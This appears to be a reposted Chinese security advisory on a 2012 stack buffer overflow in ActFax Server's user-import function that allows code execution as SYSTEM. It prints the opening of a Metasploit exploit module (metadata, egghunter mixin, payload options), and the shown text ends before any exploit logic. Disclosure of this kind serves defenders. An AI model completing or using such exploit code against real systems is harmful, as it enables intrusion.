ActFax 'Import Users from File'函数远程栈缓冲区溢出漏

发布日期:2012-09-07
更新日期:2012-09-11

受影响系统:
ActFax ActFax
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55457

ActFax Server是在Windows或UNIX的应用软件中收发传真的传真服务器软件。

ActFax (ActiveFax Server)的Import Users from File()函数存在远程栈缓冲区溢出漏洞,成功利用可以系统级别的权限执行任意代码。

<*来源:Craig Freyman
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
        super(update_info(info,
            'Name'           => 'ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow',
            'Description'    => %q{
                    This module exploits a vulnerability in ActiveFax Server. The vulnerability is
                a stack based buffer overflow in the "Import Users from File" function, due to the
                insecure usage of strcpy while parsing the csv formatted file. The module creates a
                .exp file that must be imported with ActiveFax Server. The module has been tested
                successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the
                Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Craig Freyman', # Vulnerability discovery and PoC
                    'Brandon Perry', # Metasploit module
                    'juan vazquez'   # Metasploit module
                ],
            'References'     =>
                [
                    [ 'EDB', '20915' ],
                    [ 'URL', 'http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html' ]
                ],
            'DefaultOptions' =>
                {
                    'ExitFunction' => 'process',
                },
            'Platform'       => 'win',
            'Payload'        =>
                {
                    'Space' => 4000,
                    'BadChars' => "",
                    'DisableNops' => true,
                },

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyswxj.html